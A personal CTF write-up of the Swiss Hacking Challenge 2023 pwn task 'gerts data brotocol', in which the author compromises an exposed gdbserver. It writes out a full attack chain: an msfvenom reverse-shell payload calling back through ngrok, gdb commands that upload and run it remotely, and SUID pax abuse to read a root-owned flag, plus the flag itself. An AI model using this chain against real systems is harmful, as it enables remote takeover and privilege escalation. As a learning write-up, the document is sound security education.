Gian Klug

Swiss Hacking Challenge 2023 - gerts data brotocol

Posted on Apr 25, 2023

Information

Challenge category: pwn

Challenge Description

Gert was a brilliant programmer who had just developed a new data protocol that promised to revolutionize the industry. He named it “Gert’s Data Brotocol,” or GDB for short. Excited about his invention, Gert sent out emails to all the major tech companies, hoping to create a secure partnership. But despite his best efforts, no one seemed interested in opening GDB to the public. Disheartened, Gert decided to take matters into his own hands and created a startup to launch GDB himself.

Target

We are given access to some socket address. At first it doesn’t seem like anything is responding but based off the challenge name we can assume it’s a gdbserver that we can connect to.

Exploitation

Getting a reverse shell

The following section is taken from HackTricks

We use msfvenom to generate a reverse shell payload, then run gdb, connect to the remote server and get a reverse shell, use ngrok or something equivalent to open up a port on your local machine that the shell can connect to:

# On your local machine
nc -lvp 4444
ngrok tcp 4444

# Generating the payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<NGROK_IP> LPORT=<NGROK_PORT> PrependFork=true -f elf -o binary.elf

# Chmod so gdb can run it
chmod +x binary.elf

# Open it up in GDB
gdb binary.elf

# Set the target
target extended-remote chall.m0unt41n.ch:1337

# Upload it
remote put binary.elf /tmp/binary.elf

# Set the executeable
set remote exec-file /tmp/binary.elf

# Run it
run

You should now have a reverse shell connection on your computer.

Reading the flag

As the flag in /flag.txt belongs to the root user we can’t just read it. I use linPEAS to show privilege escalation vulnerabilities.

I noticed there’s a SUID binary called /usr/bin/pax which isn’t usually there on an Ubuntu server.

I used the good old GTFOBins (amazing site btw) to show me how privileges of the binary can be abused if the SUID bit is set.

Flag

The flag can be read using pax -w /flag.txt

shc2023{R3m0te_Gd8_expl01t5_v1a_m3t4spl01t}

Conclusion

I had way too long on the root part as I overlooked the pax executable. I then found out by looking at the apt logs though. I only knew GTFOBins because of some Hack The Box stuff write-ups I read in the past and I’m glad I could actually use some things I learned.

References

  1. https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver
  2. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
  3. https://gtfobins.github.io/